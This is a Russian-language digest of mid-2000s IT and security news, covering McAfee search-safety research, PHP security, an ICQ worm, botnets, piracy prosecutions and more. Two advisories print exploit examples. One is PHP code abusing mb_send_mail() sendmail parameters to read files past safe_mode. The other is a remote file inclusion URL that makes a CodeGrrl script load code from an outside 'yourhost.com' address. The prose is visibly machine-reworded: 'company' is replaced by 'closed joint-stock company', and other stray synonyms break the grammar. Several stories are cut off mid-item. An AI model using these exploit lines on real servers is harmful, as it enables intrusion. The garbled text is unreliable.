4.4% сайтов в поисковой выдаче небезопасны для пользователя
Известный разработчик антивирусного программного обеспечения закрытое акционерное общество McAfee провела экспертизу поисковой выдачи пяти крупнейших поисковых сервисов: Google, Yahoo, MSN Live, AOL и Ask.com на основе 2500 популярных ключевых слов, задаваемых пользователями. Для анализа и решения проблем веб-безопасности авторы отчета использовали программное обеспечение группы SiteAdvisor. SiteAdvisor оценивает потенциальную степень безопасности любого веб-сайта. Сайты тестируются на опасный контент, включая шпионские и рекламные программы, фишинг и сетевые эксплойты различных уязвимостей. закрытое акционерное общество SiteAdvisor была приобретена McAfee в начале апреля 2006 г.Исследование SiteAdvisor выявило, что все протестированные поисковые машины возвращают среди своих результатов ссылки, ведущие на опасные сайты. Выдача большинства поисковых систем хоть и стала на 12 процентов безопаснее, чем это было в мае, но по-прежнему напоминает минное поле, поскольку на каждую сотню сайтов, выдаваемых по запросу пользователя, приходится в среднем 4,4 ловушки, готовых заразить компьютер посетителя злонамеренным ПО.Наибольшему риску попасть на опасный интернет портал подвержены пользователи, кликающие на контекстную рекламу, сопровождающую выдачу: вероятность нарваться на ловушку в этом случае втрое выше, чем в случае с обычными сайтами, попавшими в результаты поиска. Любители сетевой клубнички также рискуют: риск попасть на зараженный какой-нибудь гадостью интернет портал примерно вдвое выше, чем в случае с более нейтральными запросами.

  Новый язык программирования ForceBasic
ForceBasic - представляет собой средство для создания программного обеспечения. Выбирая необходимые библиотеки языка, вы можете строить приложения для выбранной платформы. Компилятор языка ForceBasic позволяет строить машинно-независемый код, который выполняется виртуальной машиной, архитектура байт-кода сконфигурирована так чтобы исполняемый код и виртуальная машина были как можно меньше по объёму, как следствие минимальный размер exe от 3K, размер виртуальной машины от 50K. ForceBasic не является системой предназначенной для узкого круга решения проблем, с помощью ForceBasic можно создавать библиотеки для различных областей программирования, для различных технологий (для графики, GUI интерфейса, звука, баз данных, манипуляции данными, и.т.д ). ForceBasic – имеет бэйсикоподобный синтаксис. ForceBasic унаследовал синтаксис Visual Basic’ка и объектно-ориентированную часть от C++, что позволяет использовать объекты просто и наглядно, как в Бэйсике, и в то же время имеет середсва для создания сложных объектов, удобных в обращении как системные объекты. Также ForceBasic является вспомогательной системой, т.е разрабатывая программу в различных средах (Visual Studio, Delphi, C++ Builder…) вы можете программировать отдельные части вашей программы на языке ForceBasic.Страничка: http://www.forcebasic.comОбщение: http://www.forcebasic.com/bforumSourceforge: http://forcebasic.sourceforge.net или http://sourceforge.net/projects/forcebasic.

  MagiQ Technologies начала продажу оборудования для квантовой криптографии
Обозревателям ресурса HackrePort.net удалось взять интервью у Боба Гелфонда, исполнительного директора американской компании MagiQ Technologies, специализирующейся на разработке технологий квантовой криптографии.ячейка экономики - фирма MagiQ Technologies начала продажу оборудования для защиты передаваемой по волоконно-оптическим сетям информации по технологии квантовой криптографии еще в 2004 году. Система QPN Security Gateway кодирует информацию о ключе в одном фотоне света, который затем передается получателю по волоконно-оптическому кабелю. Фотоны настолько чувствительны к внешним воздействиям, что любые попытки отслеживания мгновенно приводят к изменению их состояния. То есть, попытка перехвата ключа провоцирует изменения в системе и искажение передаваемой информации, о чем сразу же узнают отправитель и получатель.По словам Боба Гелфонда, системы квантовой криптографии QPN в настоящее время уже используются различными правительственными организациями, однако закрытое акционерное общество MagiQ также ведет переговоры с сервис-провайдерами. Не исключено, что крупные поставщики услуг интернета перейдут на квантовую криптографию в течение ближайшего года. Более того, как отмечает Гелфонд, достаточно широкого распространения технологии можно ожидать в течение следующих трех лет.В настоящее время протяженность волоконно-оптических линий связи, использующих квантовую криптографию, не может превышать 120 км. Исполнительный директор MagiQ подчеркнул, что данную проблему можно решить путем установки повторителей, хотя уже ведутся исследования в других направлениях.

  Эксперт по безопасности покидает команду PHP
Stefan Esser, занимавшийся выявлением проблем связанных с безопасностью, заявил об уходе из PHP security team, заявив, что потерял веру в возможность решения проблем безопасности PHP изнутри.Действительно, проблемы безопасности в PHP исправляются очень долго (в текущем дереве CVS находятся исправление проблем безопасности, которых пользователи ждут уже 6 месяцев), на них не обращается первоочередного внимания. Проблемы поднимаемые Stefan Esser просто игнорировали в PHP security team. Часто исправление ошибки приводило за собой появление новых ошибок.Примечательно, что Stefan не прекращает исследование проблем PHP, он лишь меняет принцип работы, раньше он сразу сообщал об ошибках разработчикам и ждал пока ошибку исправят, прежде чем публично опубликовать информацию. Теперь же он будет публиковать результаты своих исследований не взирая на наличие исправлений в PHP.В заключение, Ilia Alshanetsky опубликовал просто необходимый для систем массового хостинга патч к mod_php. Патч позволяет вести полный лог отправки сообщений по электронной почте через функцию mail(), а также включать в тело письма заголовок с уточнением из какого именно скрипта и от какого пользователя осуществлена отправка..

  Организация FSF запускает кампанию против Vista
Организация свободного программного обеспечения Free Software Foundation (FSF) запустила кампанию, направленную против новой операционной системы от Microsoft -- Windows Vista.Ключевая цель новой инициативы сторонников свободного ПО - предупредить всех о вреде, который наносит Windows Vista, и рассказать о существующих альтернативах из мира свободного программного обеспечения, которые (в отличие от нового продукта Microsoft) уважают права пользователей на безопасность и конфиденциальность.Питер Браун (Peter Brown), исполнительный директор FSF, так прокомментировал начавшуюся кампанию: Microsof. Наша кампания ответит на важные вопросы. Как вы можете освободить себя и свою компанию? Можете ли вы вообще быть свободными от Microsoft? Как и в нашей кампании, направленной против DRM (Digital Restrictions Management), мы хотим продемонстрировать, что технологи могут быть социальными активистами, потому что мы знаем о вреде, который причинит Vista.В частности, сообщается, что открытый для инициативы блог BadVista.org будет уделять особое внимание опасностям от так называемого Treacherous Computing в Vista (пародия на официальное название Trusted Computing, доверенные, надежные вычисления, которую можно перевести как ненадежные, предательские вычисления). Суть их заключается в том, что Vista превратит компьютеры, управляемые пользователями, в машины Большого брата, где за каждым действием пользователя следят, а ему не остается иного выбора..

  Опубликованы подробности преступления белорусского интернет Мошенника
Эта история началась с того, что в конце 2003 года в милицию обратился создатель интернет проекта webmoney.by, легальный сертификатор одноименной платежной системы в республике Беларусь. Олег Бунас построил свой бизнес на обмене виртуальных денег, и однажды его попросили обменять, а попросту говоря обналичить, более ста тысяч долларов. Эта просьба впоследствии и стала причиной его обращения в правоохранительные органы, но сначала Олег спокойно взялся за исполнение выгодного заказа.В «обменник», принадлежащий Олегу Бунасу, обратился известный в Беларуси программист, организатор ICQ-клуба Александр Жданов. Лесик (под таким псевдонимом Жданов известен многим в интернет-кругах) уже не раз пользовался услугами Бунаса, но на этот раз сотрудничество предполагало обмен весьма крупной суммы. Немного подумав, владелец согласился обналичить 120 000 долларов, правда с небольшим тайм-аутом - время требовалось, чтобы разбросать сумму по другим аналогичным пунктам, в одиночку он такой «пирог» осилить не мог. Тем временем Бунас полностью рассчитался со Ждановым, одолжив часть суммы, и ждал, пока деньги вернутся из других пунктов.Деньги исправно поступали со всего мира, однако 20 000 долларов, которые конвертатор пытался обменять через французский обменник, арестовала местная полиция. Оказалось, что средства «нечистые», о чем Бунас сообщил заказчику.

  Почему люди не любят Microsoft?
Сообщество вокруг Slashdot всегда отличалось особой ненавистью к Microsoft, так что этот интернет портал предоставляет самую благодатную почву для изучения данного феномена. Пользователь Cliff попросил всех читателей принять участие в опросе и аргументировано объяснить, за что же они так не любят крупнейшую в мире IT-компанию. Если кто-то желает, наоборот, объясниться в любви к Microsoft — и это приветствуется при наличии аргументации.За неполные сутки количество комментариев на Slashdot приблизилось к тысяче, так что уже сейчас собран огромный материал для анализа. В принципе, можно даже систематизировать и выявить самые главные причины ненависти.Низкопробные, недоделанные программы. Очевидно, крупнейший в мире производитель программного обеспечения относится к своим программам как к товару массового потребления. Большое влияние в компании имеют маркетологи и менеджеры, далекие от программирования. Из-за этого программы и оборудование Microsoft часто выпускается на рынок «сырым», несовершенным, плохо выполняющим свои функции, нестабильным и даже небезопасным.

  Эпидемия ICQ червя в рунете
Вчера большое количество пользователей рунета получили по ICQ приглашение на интернет портал seruijingandeshijinpos.com. Сообщения пользователям поступали от их знакомых. Переходы на этот интернет портал привели к массовому заражению вирусом Warezov. Вирусные сообщения по аське начинаются короткой фразой check this или my picture - уже здесь русскоязычные пользователи могут насторожиться, если сообщение пришло от соотечественника. После английской фразы следует ссылка на один из файлов, находящихся на домене seruijingandeshijinpos.com.Первые вирусные ICQ-рассылки такого рода регистрировались еще осенью. Однако вчера это уже напоминало эпидемию. Как выяснила китайская антивирусная группа C.I.S.R.T, по присланным адресам-ссылкам располагаются трояны семейства Warezov.

  Арестован системный администратор по обвинению в установке “логической бомбы”
Лин был арестован во вторник утром в своём доме агентами ФБР и предстал перед магистратским судом к полудню. Его дело будет рассматриваться 3 января. Адвокат Реймонд Вонг (Raymond Wong), заявляет, что его подзащитный отрицает обвинения, поскольку в случае срабатывания логической бомбы стало бы сразу известно, кто её установил.Линь обвиняется в установке в 2003 году так называемой логической бомбы, которая могла бы уничтожить фактически всю информацию на 70 с лишним серверах Medco Health Solutions. На серверах хранились многочисленные приложения и базы данных, в случае потери которых закрытое акционерное общество понесла бы невосполнимый ущерб.По утверждению обвинения, системный администратор начал свою незаконную деятельность в августе 2003 года, после того как Medco отделилась от корпорации Merck. В компании начались сокращения, четверо сисадминов были уволены, и Линь испугался, что его может постичь та же участь. Однако его не уволили, и он перенёс срок срабатывания программы ещё на год, до 23 апреля 2004 г., в день его рождения. Кроме того, «бомба» содержала ошибку, вследствие которой не сработала бы.

  Январь станет месяцем багов для Apple
Два специалиста по проблемам в области информационной безопасности заявили о готовности в течение месяца ежедневно сообщать о новых уязвимостях в программных продуктах для компьютеров Apple. Вероятнее всего, поток отчетов об уязвимостях придется на январь будущего года.Таким образом, Кевин Финистерр (Kevin Finisterre) и человек, скрывающийся под ником L.M.H., намерены продолжить серию акций, подобных июльскому месячнику багов в браузерах и ноябрьскому месячнику багов в ядрах операционных систем. Инициаторы акции заявили, что обнаружили уже достаточное количество брешей в операционной системе Mac OS X, чтобы сообщать об одной из них ежедневно в течение 31 дня.Финистерр подчеркнул, что несмотря на достаточное количество выявленных уязвимостей, переговоры с Apple о проведении акции только начались. В связи с этим, срок проведения акции может быть изменен. Например, аналогичный проект — неделя брешей в СУДБ Oracle, в последний момент был отменен по неназванным причинам. Во избежание подобной ситуации, Финистерр и его партнер намерены предварительно передать информацию о некоторых уязвимостях Apple.В ходе месячника багов в ядрах операционных систем пользователи Apple раскритиковали одну из опубликованных брешей. Речь шла об уязвимости в формате DMG, используемом для создания имиджей дисков.

  Google выдал полиции результаты поисковых запросов хакера
Обиженный бывший сотрудник компании Alpha Computer Service был обвинен в попытке взлома после того, как поисковые запросы Google показали, что он пытался искать в сети техническую информацию о способах взлома систем компании.Метью Шустер ранее работал в службе поддержки системы домашних беспроводных сетей CWWIS компании Alpha Computer Service.Будучи уволенным, он использовал клиентскую информацию чтобы получить свободный доступ в беспроводную сеть компании.Использование услуг Google стало для Шустера роковой ошибкой, поскольку содержимое его поисковых допросов были запротоколировано системой G. Шустер искал в Google информацию типа how to broadcast interference over wifi 2.4 GHZ, wireless networks 2.4 interference и interference over wifi 2.4 GHZ”, которые использовались в суде как основное доказательство его вины. В результате Шустера приговорили к 15 месяцам тюремного заключения и 20.000$ штрафа.Остается вопрос каким образом было доказано, что запросы выполнял именно Шустер? Скорее всего, либо Google регистрирует IP адреса пользователей, вводивших поисковый запрос, либо регистрирует поисковые запросы пользователей, зарегистрировавшихся в различных сервисах Google.Это уже не первый случай скрытой слежки за пользователями, и передачи информации об отдельных гражданах властям, со стороны Google. В 2005 году был осужден житель США за убийство жены, который перед этим искал в Google информацию по словам neck, snap, break и hold..

  Преступления в сфере интеллектуальной собственность могут быть приравнены к тяжким
Госдума рассмотрела в первом чтении поправки в Уголовный кодекс, которые ужесточают ответственность за нарушение авторских и смежных прав, а также прав владельцев товарных знаков. Как сообщают «Ведомости», срок лишения свободы за такие преступления предполагается увеличить с 5 до 6 лет, а штрафы за использование чужих товарных знаков – с 300 000 руб. до 500 000. Авторы законопроекта уточняют: поправки касаются только преступлений в особо крупном размере – на сумму более 250 000 руб.Вместе с тем в интернете количество пиратов и кибесквоттеров в 2008 году только увеличится. Такой прогноз дали эксперты в области авторского права на семинаре «Будущее российского интернета после вступления в силу новой части гражданского кодекса об интеллектуальной собственности», сообщает «Деловой Петербург». Напомним, 4-я часть ГК также прописывает ужесточение ответственности за нарушение авторских прав. Но, предполагают аналитики, на деле это приведет только к сокращению числа крупных интернет-проектов.«Даже малейший промах со стороны владельцев сайтов, как, например, публикация картинки без письменного разрешения ее автора, будет считаться правонарушением, - говорит Константин Леонтьев, доцент кафедры авторского права Российского государственного института интеллектуальной собственности.

  Обход ограничений безопасности в PHP
Программа:PHP 4.xPHP 5.0.xPHP 5.1.x Опасность: Низкая Наличие эксплоита: Да Описание: Обнаруженные уязвимости позволяют локальному пользователю обойти ограничения безопасности.1. Функция mb_send_mail() позволяет передавать дополнительные параметры sendmail с помощью параметра additional_parameter. Злоумышленник может заставить sendmail прочитать произвольный файл в качестве конфигурационного файла и сохранить результат в произвольную доступную для записи директорию на системе. Злоумышленник может обойти ограничения safe_mode и open_basedir и просмотреть произвольные файлы на системе. Уязвимость существует в версии 5.1.2 и в версиях 4.х. Пример:$additional_param = -C .$file_to_read. -X.getcwd()./.$output_file;mb_send_mail($email_address, NULL, NULL, NULL, $additional_param);2.

  Разработчики Firefox не смогли устранить ошибки при работе в Vista
Хотя на прошлой неделе было выпущено обновление безопасности для браузера Firefox, его комфортное использование в Windows Vista до сих пор остается под большим вопросом. 20 ошибок при работе в системе нового поколения – этот показатель может стать существенным препятствием в завоевании браузером Mozilla рынка, который начнет формироваться после выхода в январе Vista.Причем еще не устраненные ошибки фактически являются критическими, так как не позволяют устанавливать полную совместимость между Vista и Firefox. Среди прочих существенных проблем: Firefox не может становиться в системе браузером по умолчанию; обновления могут подвесить браузер, если он установлен не в директорий, указываемом по умолчанию; Firefox может зависать при закрытии после просмотра файлов формата PDF через плагин Adobe Acrobat Reader. Насчет последней проблемы Mozilla на своем интернет портале дает интересное примечание: если у вас есть эта ошибка, то вы используете последнюю версию плагина.Всего в коллекции Mozilla Bugzilla содержаться 34 ошибки. Некоторые из них появились из-за функции Vista по контролю родителями за использованием компьютера детьми. Не обошли стороной баги и почтовый клиент Thunderbird. Точно известно, что пока он не может становиться программой по умолчанию в Vista..

  В Хакасском суде пытались понять что такое интернет портал и как его конфисковывать
25 декабря в Абакане прошло заседание по обжалованию решения суда, по которому интернет портал журналиста Михаила Афанасьева «Новый фокус» нужно конфисковать, а владельца обязать заплатить 20 тысяч рублей штрафа. Напомним, постановление об административном правонарушении с такими требованиями вынесла 1 декабря мировой судья участка №4 Абакана Марина Хохлова. Причиной конфискации интернет проекта стало отсутствие у него регистрации в качестве СМИ. Апелляцию подготовили юристы Межрегиональной правозащитной Ассоциации «АГОРА». Представителя МВД судья отказалась допустить в качестве участника процесса, и он присутствовал на заседании в качестве зрителя.Судья Абаканского городского суда Светлана Шаповалова в отличие от своей коллеги Хохловой в течение заседания пыталась разобраться, что такое сайт, как он функционирует и раскручивается в Интернете. Выслушав подробный мастер-класс Афанасьева, судья обратилась к помощнику прокурора Абакана, который не будучи приглашенным на заседание явился по собственной воле: «И что в этом случае, по-вашему, необходимо изъять?»Отметив некоторое замешательство, Светлана Шаповалова, подняв стопку журналов, пояснила, что перед ней лежали газеты и журналы, она понимает, что это незаконное СМИ и может их изъять. А что изымать, когда речь идет о сайте? Помощник прокурора в ответ сослалась на закон и указала, что в нем сказано: «изъять орудие».

  Спамеры и фишеры атакуют пользователей MySpace
Похитители данных все активней охотятся за пользователями популярной социальной сети MySpace, сообщает Associated Press. Излюбленный прием мошенников - ссылки на фальшивые страницы авторизации, которые требуют ввести пароль заново. В лучшем случае, неизвестные друзья завалят жертву спамом, а в худшем - приберут к рукам персональную информацию, например логины и пароли в платежных системах и онлайновых кошельках.По оценкам comScore, MySpace занимает в США второе место после Yahoo по количеству посетителей - за год оно выросло до 38,7 миллиона. Однако, как отмечают специалисты в области сетевой безопасности, эффективной технологии, которая бы не позволила злоумышленникам развернуться на ее просторах у социальной сети пока нет.Огромную привлекательность MySpace для мошенников эксперты связывают с тем, что она предлагает ряд специальных технологий для общения пользователей между собой. Например, возможностью рассылки сообщений всей френдленте сразу уже вовсю пользуются спамеры.Одна из последних обманных схем в MySpace выглядела так. Спамер создал несколько фальшивых профилей, разместив на них пикантные фотографии девушек и пообещав позже вывесить еще более откровенные фото. Затем он прикрепил одно из этих изображений к запросу на добавление в друзья и разослал его нескольким сотням пользователей.

  PHP инклюдинг в продуктах CodeGrrl
Программы: PHPCalendar 1.xPHPClique 1.xPHPCurrently 2.xPHPFanBase 2.xPHPQuotes 1.x Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.Уязвимость существует при обработке входных данных в параметре siteurl сценария protection.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на системе с привилегиями web сервера. Для успешной эксплуатации уязвимости опция register_globals должна быть включена в конфигурационном файле PHP. Пример:http://www.example.com/protection.php?action=logout& siteurl=http://yourhost.com/malicoius-code.txt URL производителя: http://codegrrl.com/Решение: Способов устранения уязвимости не существует в настоящее время..

  Бот-сети - основа киберпреступности
Аарон Корнблюм, главный юрист подразделения Internet Safety Enforcement корпорации Microsoft, считает, что основой современной киберпреступности являются сети зомбированных компьютеров с широкополосным выходом в интернет.Бот-сети в настоящее время широко используются злоумышленниками для рассылки спама, организации DoS-атак на неугодные ресурсы и осуществления фишерских махинаций. По данным компании Symantec, в первой половине текущего года количество зомбированных машин превышало 4,5 миллиона. Причем владельцы таких компьютеров, как правило, даже не подозревают, что киберпреступники имеют полный доступ к их системам.Корнблюм подчеркивает, что в настоящее время наблюдается рост количества фишерских сайтов. Причем ели раньше злоумышленники выбирали в качестве жертв клиентов крупных и известных онлайновых банков, то сейчас все больший интерес они проявляют к небольшим фирмам и компаниям среднего размера, клиенты которых хуже осведомлены об опасности фишинга.Сейчас в каждый отдельный момент времени рассылку спама и вредоносного контента осуществляют порядка 50 тысяч зомбированных машин. Причем поскольку киберпреступникам не нужно оплачивать трафик, в сообщения может быть включена графика большого объема или документы. Фактически, отмечают эксперты, бот-сети определяют экономику и расстановку сил в мире киберпреступности..

  Группа ученых израильского института имени Вейцмана изобрела молекулярный замок
Проект новой кодовой панели, разработанной Абрахамом Шанцером (Abraham Shanzer) и его сотрудниками из Научного института Вайзманна (Weizmann Institute of Science), основан всего на одной молекуле. Для обработки кода этой молекуле требуется корректный пароль, определённые химические соединения, реагирующие в заданной последовательности, и ультрафиолетовое излучение.Основа кодовой панели – созданная Шанцером с коллегами молекула FLIP. К ней присоединены две молекулы, которые в зависимости от внешних условий (веществ, с которыми происходит реакция, и действия ультрафиолета) могут светиться синим или зелёным цветом.Фактически, в данном случае речь не о какой-то конкретной кодовой панели, которую можно пощупать, а о механизме, принцип которого в дальнейшем можно применить на практике. Таким образом, молекула FLIP – это своего рода логический элемент, реагирующий на получаемые сигналы определённым свечением.В этом проекте учёные предусмотрели три кнопки, с помощью которых можно вводить данные: это молекула кислоты, молекула щёлочи и ультрафиолетовое излучение. Важно, что молекула FLIP может реагировать на два пароля, как это часто используется в современных технологиях (обычно один пароль – это просто пароль, а другой — это какое-нибудь дополнительное секретное слово).В зависимости от того, в какой последовательности FLIP реагирует с этими молекулами и подвергается облучению, формируются различные ответы. К примеру, если пароль представляет собой последовательность воздействия щёлочи, а затем ультрафиолета, то молекула FLIP будет испускать синее свечение. Если же последовательность будет такой: кислота – щёлочь — ультрафиолет, то свечение будет зелёным.

  MMS эксплоит для Windows mobile телефонов
Symantec предупреждает о появлении эксплоита, который заражает мобильные устройства используя MMS (multimedia messaging service) сообщения.Уязвимость позволяет злоумышленнику послать специально сформированное MMS сообщение, чтобы выполнить произвольный код на мобильном устройстве, когда пользователь попытается просмотреть это сообщение. Как сообщает Symantec, об уязвимости было сообщено более 6 месяцев назад, однако до сих пор она не устранена. MMS клиент для Windows Mobile разрабатывается сторонними разработчиками. Этот клиент обычно доступен от производителей мобильных устройств.Известно, что уязвимая программа ArcSoft MMS Composer поставляется с устройствами HP iPAQ h6315, i-mate PDA2k и многими другими..

  Диски с Firefox изъяли из продажи
Фонд Mozilla Foundation столкнулся недавно с довольно неприятной, но показательной ситуацией. Британское министерство по торговым стандартам постановило изъять из продажи партию компакт-дисков с копиями браузера, объясняя свои действия законом о борьбе с пиратством. Один из сотрудников Mozilla Foundation в интервью изданию Times Online раскрыл подробности произошедшего. По его словам, министерство обратило внимание на продажи сторонних компакт-дисков с копиями продукции Mozilla и пришло к ошибочному выводу, что распространение такой продукции нелегально. Лицензия Mozilla Public License, как и большинство свободных лицензий не запрещает коммерческое распространение копий программного обеспечения. Исключение составляют лишь измененные версии, вопрос распространения которых следует согласовывать с правообладателями. В данном же случае на продажу были выставлены копии оригинальных продуктов Mozilla Foundation, и ни о каком пиратстве речи быть не могло.

  Mysql отказывается от GPL v3?
Недавно один из бывших разработчиков MySql обратил внимание на то, что для свободного скачивания перестали быть доступными новые версии Mysql в бинарном формате. Последняя доступная бинарная версия для скачивания – mysql 5.0.27, однако уже как несколько месяцев во многих дистрибутивах доступна версия 5.0.30.В результате поползли слухи, что mysql предал принципы свободного ПО и вынуждает компании использовать платную версию базы данных, стоимость которой до 5000$ при ежегодном обновлении лицензии. Эта цена соответствует цене базе данных Oracle для 2-х процессорного сервера, которая к тому же не ограничена по времени. Бесплатная и платная версия компилируется с одних и тех же источников,однако, по заверению разработчиков, Enterprise версия более отличается значительной стабильностью, а бесплатная содержит множество различных и недостаточно протестированных усовершенствований.MySQl также изменил схему лицензирования MySQl 5.0 и 5.1 от GPLv2 or later” к “GPLv2 only“, т.е. отказался от обязательств перехода на 3-ю версию. Также MySQl распространил авторское право на весь свой код, что позволяет компании изменить лицензию в любое время по желанию..

  Пользователи Gmail пострадали от уязвимости в Firefox?
Большое число пользователей почтового сервиса Gmail жалуются на мистическую пропажу с их аккаунтов всех сообщений. Впервые это событие получило огласку на интернет портале TechCrunch, где автор Майкл Аррингтон (Michael Arrington) сообщил, что говорить о Gmail как о совершенном сервисе пока еще рано. Там же было размещено первое сообщение с форума Google Groups, касающееся исчезновения содержимого электронных почтовых ящиков. Я обнаружил свой аккаунт абсолютно пустым – ничего в папке Inbox, контактах и отправленных сообщениях. Как могла исчезнуть информация из разных папок?.. Как сообщить об этом техподдержке и восстановить данные?, - написал пользователь Gmail 19 декабря 2006 года. Как оказалось, большинство пострадавших пользовались браузером Firfox и обнаружили пропажу контента при открытии аккаунта через него.

  Китайцы в результате землетрясения потеряли 10.000 доменных имен
Государственные СМИ Китая сообщили, что в результате тайваньского землетрясения, произошедшего в прошлом месяце и ставшего причиной множественных разрушений, произошла потеря порядка десяти тысяч доменов в Интернете. Как выяснилось, из-за затрудненного доступа или вообще отсутствия оного большое число владельцев сайтов физически не имели возможности обновить или перерегистрировать свои порталы, объясняется в заявлении китайского центра International Network Information. При этом серверы, где располагались доменные имена, не несут ответственности за утерянные адреса в результате задержки перерегистрации, несмотря на форс-мажорные обстоятельства сложившейся ситуации. В то же время сейчас разрабатывается схема, по которой владельцы серверов предоставят индивидуальным пользователям и закрытое акционерное общество определенную компенсацию. Параллельно с проблемами на суше объединенными силами в тайваньских водах азиатский регион пытается решить силами пяти кораблей, прибывших несколько дне назад на место работ, проблему замены подводных кабелей. Напомним, что из-за землетрясения были повреждены четыре кабеля, соединяющие Тайвань с Южной Азией и разорвана связь с США и Европой в девяти местах. Согласно прогнозам, восстановительные работы займут не более нескольких недель..

  Администраторы Википедии закрыли доступ для жителей Катара
Жители государства Катар, использующие Интернет-энциклопедию Wikipedia, были очень удивлены, когда обнаружили, что не могут анонимно оставлять комментарии. Причина оказалась проста – кто-то из Катара, используя возможность Википедии анонимно редактировать статьи, занялся хулиганством, изменив истории о США и пророке Мухаммеде. Редакторы Википедии отреагировали адекватно – забанили возможность анонимного редактирования статей для IP-адреса, с которого были зафиксированы акты Интернет-вандализма, на 12 часов. Ну откуда же им было знать, что все жители Катара имеют в Интернете один-единственный IP-адрес? В государстве, в котором проживает около 630 тысяч человек, есть только один провайдер, который работает как шлюз для всех пользователей. Катар больше всего известен в мире своим телеканалом Аль Джазира.Как только стало известно о том, что на интернет портал Интернет-энциклопедии не могут зайти жители целого государства, представители Википедии выступили с заявлением о том, что бан был временным и о том, что блокирование доступа к сайту целой страны было случайным и противоречит политике проекта. Они также сообщили, что целью этого проекта является привлечение к нему как можно большего числа людей, поэтому ни о каком преднамеренном бане страны не может быть и речи. Администраторы Интернет-энциклопедии делают все возможное для того, чтобы временно закрывать доступ к сайту только для тех, кто занимается вандализмом, однако в данном случае это сделать не удалось из-за технических ограничений Катара..

  «Бегун» открыт для внешних разработчиков
«Бегун» объявляет об открытии интерфейса взаимодействия программных продуктов Бегун.API. закрытое акционерное общество «Бегун» разработала интерфейс API (Application Programming Interface) для объединения усилий в работе над своими продуктами с внешними разработчиками,партнерами и дилерами. Бегун.API позволяет партнерам по разработке создавать приложения и веб-сервисы, взаимодействующие с сервисом контекстной рекламы по специальному протоколу. Сервис «Бегун» объединяет рынок контекстной рекламы, в который входят рекламодатели, рекламные агентства, дилеры платежей, рекламные площадки и технологические партнеры. С каждой из этих групп через многофункциональный интерфейс реализуются различные модели взаимодействия. Открытие API «Бегуна» дает возможность независимым разработчикам из числа участников рынка наращивать и развивать необходимый им функционал сервиса и автоматизировать типовые операции. Также API позволит повысить удобство интерфейса «Бегуна» за счет новых возможностей от внешних поставщиков, интегрировать системы биллинга, статистики и независимого аудита.

  Сегодня судят директора школы за установку нелицензинного ПО
Сегодня в Верещагинском районном суде (г.Верещагино Пермского края, Ленина, 24) состоялся суд над директором Сепычевской средней школы Александром Поносовым, обвиняемым в использовании нелицензионного программного обеспечения корпорации Microsoft.В ноябре 2006 года прокуратура Верещагинского района возбудила в отношении Александра Поносова уголовное дело по ст.146 УК РФ за нарушение авторских прав корпорации Microsoft.В компьютерном классе Сепычевской школы в ходе проверки прокуратура обнаружила несколько нелицензионных программ Windows, установленных на компьютерах, на которых дети занимались. рублей, что является использованием объектов авторского права в особо крупном размере (Постановление о привлечении в качестве обвиняемого от 20.11.2006). Согласно действующему уголовному кодексу директору школы грозит лишение свободы на срок до 5 лет.Специфика ситуации состоит в том, что компьютеры вместе с программным обеспечением для новой Сепычевской школы были поставлены по заказу Управления капитального строительства Пермской краевой администрации. Подрядчиком, нанятым управлением, выступила верещагинская строительная ячейка экономики - фирма Сатурн, а субподрядчиком, поставившим компьютеры и софт, - предприниматель Евдокимов. Сам же директор и другие работники школы с приобретением и установкой программного обеспечения никакого дела не имели..

  Microsoft так и не закрыла критические уязвимости в Word
Microsoft выпустила ежемесячное обновление безопасности, закрывшее 10 уязвимостей, включая критические в Office и Windows. Однако серьезные дыры типа zero-day в текстовом редакторе Word остались незакрытыми.Хакеры в последние месяцы уделяли повышенное внимание незакрытым уязвимостям в Word и Excel для проведения узконацеленных атак. Обычно их жертва получает электронное письмо с инфицированным вложением и текстом в теле письма, заманивающим открыть это вложение. В конце прошлого года было найдено множество уязвимостей офисного пакета Microsoft типа «zero-day», то есть они становились известными хакерам еще до выпуска соответствующего патча производителем. Причем многие из этих «дыр» обнаруживались и начинали активно эксплуатироваться хакерами сразу после выхода ежемесячного обновления безопасности софтверного гиганта, что говорит о припособлении компьютерных преступников к графику выпуска патчей.Во вчерашем обновлении Microsoft содержатся патчи к 5 критическим уязвимостям редактора электронных таблиц Excel, которые позволяли выполнить удаленно произвольный код на целевой системе. Это уязвимости из-за ошибок при обработке записей, строк, и проверки границ данных в Palette-записях. Уязвимы Microsoft Office 2000, XP и 2003.Последнее обновление безопасности Windows решило и проблему, связанную с недостаточной проверкой входных данных в библиотеке vgx.dll в реализации Vector Markup Language (VML).

  Молодой норвежский хакер положил начало конца системе защиты авторских прав
Недавний выход программы, которая может декодировать фильмы на HD DVD и Blu-ray дисках, является первым шагом на пути к устареванию стандарта кодирования, использующегося в видеоплейерах следующего поколения, заявляют исследователи Принстонского университета. В прошлом месяце хакер Muslix64 выпустил приложение, декодирующее фильмы, созданные с применением системы AACS (Advanced Access Content System), поддерживающейся Голливудом и многими производителями видеоплееров. Впервые введенная в апреле 2005 года, AACS нашла поддержку в лице Microsoft, Panasonic, Sony, Toshiba, Walt Disney и Warner Bros. Исследования показали, что приложение BackupHDDVD не может взломать AACS, но для продвинутых пользователей существенно облегчает задачу декодирования фильмов. AACS первоначально была предложена как замена CSS (content scrambling system), системы защиты DVD. Последняя была взломана через несколько лет после появления усилиями трех хакеров, среди которых был 16-летний Джон Джохансен (Jon Johansen), разработавший BackupHDDVD. В итоге аналитики предсказывают, что молодой норвежский хакер положил начало конца распространенной ныне системе защиты авторских прав.Новая версия системы защиты информации применялась при выпуске в широкую продажу фильмов «Metal Jacket», «The Last Samurai», и «The Fugitive».

  Китай создает собственную DNS
1 марта в Китае будет запущена новая система доменных имен (DNS). В рамках новой системы будут созданы три новых временных домена верхнего уровня (TLD): .CHINA, .COMPANY и .NETWORK, которые будут доступны только в китайских сетях. Маршрутизация новых китайских TLD будет осуществляться не серверами мировой системы доменных имен, поддерживаемых ICANN, а напрямую китайским внутренними серверами доменных имен. В результате будет создан внутрикитайский интернет, доступный только с территории Китая. Также с запуском новой китайской DNS будут добавлены 44 новых домена второго уровня (2LD). Ими станут 7 категорийных (родовых) доменов, 34 региональных домена для автономных регионов, провинций, муниципалитетов и специальных административных зон Китая, и три домена .AC.CN, .GOV.CN, .MIL.CN для академических, государственных и военных ресурсов соответственно..